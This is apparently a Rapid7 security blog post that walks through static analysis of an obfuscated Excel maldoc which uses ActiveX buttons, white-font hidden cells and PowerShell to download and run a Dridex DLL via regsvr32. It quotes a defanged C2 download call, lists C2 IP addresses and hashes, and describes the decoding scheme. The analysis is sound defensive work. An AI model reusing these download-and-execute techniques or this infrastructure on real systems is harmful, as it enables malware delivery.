Last updated at Fri, 17 Apr 2020 13:48:16 GMT

Rapid7’s Managed Detection and Response (MDR) services team leverages specialized toolsets, malware analysis, tradecraft, and collaboration with Rapid7’s Threat Intelligence researchers to detect and remediate threats.

Recently, we identified increased use of a type of malicious document that leverages ActiveX buttons, embedded VBA macros that modify cell contents, and white fonts to hide obfuscated code that downloads, decodes, and executes a sample associated with the Dridex family of malware using regsvr32.

The first step in analyzing any potentially malicious sample is to open the document in a controlled environment, execute it, and observe its behavior. This process is commonly called “basic dynamic analysis.”

Basic dynamic analysis can reveal the behavioral characteristics of a sample and provide insight into a sample’s capabilities. However, one downside of basic dynamic analysis is that, while one can observe that an event occurred, one can miss the reason why it happened.

Basic static analysis has many benefits, especially when the nature of a malicious document is unknown. Arbitrarily detonating samples can alert malicious actors that a sample has been opened, allows for the fingerprinting of a defender’s sandbox technologies, and allows for the creation of block lists from command and control servers.

Statically analyzing malicious document code to better understand how a malicious document achieves its goal(s) allows for the creation of signatures and alerting, and can therefore improve time to detection and remediation for an organization.

In this blog post, we will analyze an obfuscated malicious document with a focus on basic static analysis.

MalDoc Analysis

Today’s blog will investigate the following suspicious document:

Malicious document sample:
MD5: DE2B9C76F2714B136FBA35B0F5814E0A
SHA1: A4B003322D338EF1B5B48DDB702340A1ABEF7D63
SHA256: 15D3EDCF37B1E4D03A5C61C1C7752130A9899B978C94F80D8DABC45F416FC253

To begin with malicious document analysis, our MDR team often detonates samples using open-source automated malware analysis sandbox tools. These tools help to gain insight into the behaviors of the sample in question.

In this instance, the behavior that Rapid7 identified in a customer environment was not present in the automated detonation. This is an indication that the malicious document sample requires user interaction or has anti-analysis functionality.

While Rapid7 found that this macro declares three functions—text, Sdf, and vess—there is no call to these functions within this macro code, which is common. Sometimes, malware authors include functions that are never called to create a time sink for analysts. Therefore, we need to determine if and how this code is called before we continue to analyze it.

Rapid7 also discovered this macro:

This macro shows the calls to the ThisWorkbook.vess function, which is expected.

Typically, malicious macros will have AutoExec functionality, which means the malicious code is executed as soon as macros are enabled. We can infer that these macros would not successfully execute in some sandbox environments due to the need for user interaction. We can also infer that the author included them as a method of inhibiting automated analysis.

So, how are the necessary subprocedures i_Layout() or Preview_Click() called to launch the malicious functions?

We can see that the lure image is called i. The function i_Layout() would be launched if a user resizes the image named i (https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/layout-event).

We can also see that the ActiveX control button is called Preview, and so the function Preview_Click()
(https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/click-event) is launched if a user clicks the Preview button.

So now we know that if a user resizes the lure image or clicks the Preview button, the associated subprocedure is called. Both subprocedures call the function ThisWorkbook.vess(). Function vess contains a debug print statement and nested function calls. (See Line 38.)The innermost function call is text(200, 10, 13748).

If we look at the text() function, we can see that it uses the Worksheet.Cells Excel property (https://docs.microsoft.com/en-us/office/vba/api/excel.worksheet.cells). With the first and second parameters passed to the text function, this will return the contents of the cells 200,1 to 200,10.

It attempts to loop through the cell contents using the Len() function (https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/len-function), or the length of those cells, and saves the values into an array using the functions ReDim() and Mid() (ReDim() function, Mid() function). It then loops through the array and concatenates every fourth character into a return string.

If we open the document and look at the referenced cells, we would see that they are empty except for the last cell, which contains a large string hidden with white font.

Using the following CyberChef recipe, we can Base64-decode and inflate the stream to simulate what PowerShell would do:

CyberChef
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis

This results in the following:

This payload is peppered with backticks, which are an escape sequence in PowerShell, and only interpreted within double-quotes.

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_special_characters?view=powershell-7

Let’s remove them:

Output:

You might recognize the same type of PowerShell format string obfuscation we dealt with above.

We can reuse some of our code!

Output:

Let's remove the pesky "'+'"'s again.

Output:

Finally, we can append semicolons with newlines and format the code appropriately.

Now, we are getting to the core of the payload.

We can see calls to [System.Security.Principal.WindowsIdentity]::(GetCurrent).Invoke())."User"."Value";
which returns the SID of the current user. The SID is later used in the request (New-Object Net.WebClient).DownloadData("https://turendot[.]com/dot?(SID)"), which is created from concatenating values that were obfuscated with Set-Item and Set-Value aliases.

The payload splits the C2 response into two objects split on the ! character. It then saves the first character from the response as a UTF-8-encoded XOR key before removing that same character from the first object. The payload then performs a base64-decode on the first object in the split response, and then performs a standard XOR operation upon the base64-decoded object.

After the XOR operation, the payload performs another base64-decode on the base64-decoded XORed object from the first object in the split response. It then concatenates all of that with the base64-decoded data from the second object in the split response with the last 200 characters removed.

This decoded and concatenated payload is then executed with regsvr32 /s <PAYLOAD>.

Rapid7 acquired two responses from the C2. The responses were similar in nature to the following examples, but have been modified to reduce visibility into Rapid7’s analysis environment:

C2 Response A
C2 Response B

We can decode the responses by emulating what the PowerShell would have done with the following script:

Decoded Payload From C2 Response A:
MD5: D498893DB1DAC590D053860C9F88A2E8
SHA-1: 77C5F40CBAA32E5B1225485104575424815D26AF
OriginalFileName: nearsummer.dll

Decoded Payload From C2 Response B:
MD5: 127C2EB0D907B969092749EA91CD2E81
SHA-1: F371EFF5DA6A58DF9A232CF0DD88F4EBA48726F2
OriginalFileName: nearsummer.dll

Rapid7 analyzed publicly available samples using VirusTotal's vhash fuzzy hashing search, and identified many samples that were similar to the decoded payload.

After further inspection using binary diffing, Rapid7 determined that the analyzed samples differed only by four bytes. This extreme similarity provides insight into how the C2 server might function, though this is only speculation driven purely by static analysis. Below is sample code for the generation of a payload that the analyzed malicious document could successfully execute:

Now that we have samples to work with and have acquired context, while also limiting interaction with malicious infrastructure, we can begin basic dynamic analysis.

After detonating the decoded payloads with regsvr32, we were able to identify a sleep function which prints debug strings. This is likely used as an anti-analysis technique since it wastes analyst’s time. We were also able to identify network connection attempts using function InternetConnectW with the following ServerName:ServerPort arguments:

5.45.179.186:443
91.103.2.132:4543
89.107.129.122:4143
46.101.214.173:3886

The behavioral characteristics, in conjunction with open-source intelligence that ties identified IP addresses to known infrastructure, indicates that these samples are associated with the Dridex family of malware.

C2 operators have the capability to limit researchers, defenders, and sandboxes from interacting with malicious infrastructure. C2 operators are able to block or limit access by IP address, allow or disallow by user agent, allow only unique payloads to limit analysis, and many other techniques to identify unwanted interaction with their infrastructure.

It is useful to employ static analysis to limit unnecessary interaction with malicious infrastructure, and inhibit malicious actors from detecting, fingerprinting, and restricting access. When facing unknown threats, or the aforementioned obfuscation techniques, it is beneficial to have a team of around-the-clock experts monitoring and defending against threats to stop malicious actors in their tracks.

Learn more about our Managed Detection and Response (MDR) Services

Get Started